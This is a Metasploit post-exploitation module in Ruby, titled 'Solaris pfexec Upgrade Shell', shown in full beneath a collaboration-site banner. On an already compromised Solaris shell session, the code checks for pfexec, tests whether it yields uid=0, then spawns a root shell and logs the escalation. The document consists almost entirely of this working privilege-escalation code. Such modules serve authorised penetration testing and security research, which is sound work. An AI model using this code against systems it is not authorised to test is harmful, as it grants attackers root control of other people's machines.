Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Solaris::System
9
  include Msf::Post::Solaris::Priv
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Solaris pfexec Upgrade Shell',
16
        'Description' => %q{
17
          This module attempts to upgrade a shell session to UID 0 using pfexec.
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => ['bcoles'],
21
        'Platform' => 'solaris',
22
        'References' => [
23
          ['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],
24
          ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],
25
          ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']
26
        ],
27
        'SessionTypes' => ['shell']
28
      )
29
    )
30
    register_options [
31
      OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),
32
      OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])
33
    ]
34
  end
35

36
  def shell_path
37
    datastore['SHELL_PATH'].to_s
38
  end
39

40
  def pfexec_path
41
    datastore['PFEXEC_PATH'].to_s
42
  end
43

44
  def run
45
    unless session.type == 'shell'
46
      fail_with Failure::BadConfig, "This module is not compatible with #{session.type} sessions"
47
    end
48

49
    if is_root?
50
      fail_with Failure::BadConfig, 'Session already has root privileges'
51
    end
52

53
    unless command_exists? pfexec_path
54
      fail_with Failure::NotVulnerable, "#{pfexec_path} does not exist"
55
    end
56

57
    user = cmd_exec('id -un').to_s
58

59
    print_status "Trying pfexec as `#{user}' ..."
60

61
    res = cmd_exec "#{pfexec_path} #{shell_path} -c id"
62
    vprint_status res
63

64
    unless res.include? 'uid=0'
65
      fail_with Failure::NotVulnerable, "User `#{user}' does not have permission to escalate with pfexec"
66
    end
67

68
    print_good 'Success! Upgrading session ...'
69

70
    cmd_exec "#{pfexec_path} #{shell_path}"
71

72
    unless is_root?
73
      fail_with Failure::NotVulnerable, 'Failed to escalate'
74
    end
75

76
    print_good 'Success! root shell secured'
77
    report_note(
78
      host: session,
79
      type: 'host.escalation',
80
      data: "User `#{user}' pfexec'ed to a root shell"
81
    )
82
  end
83
end
84

85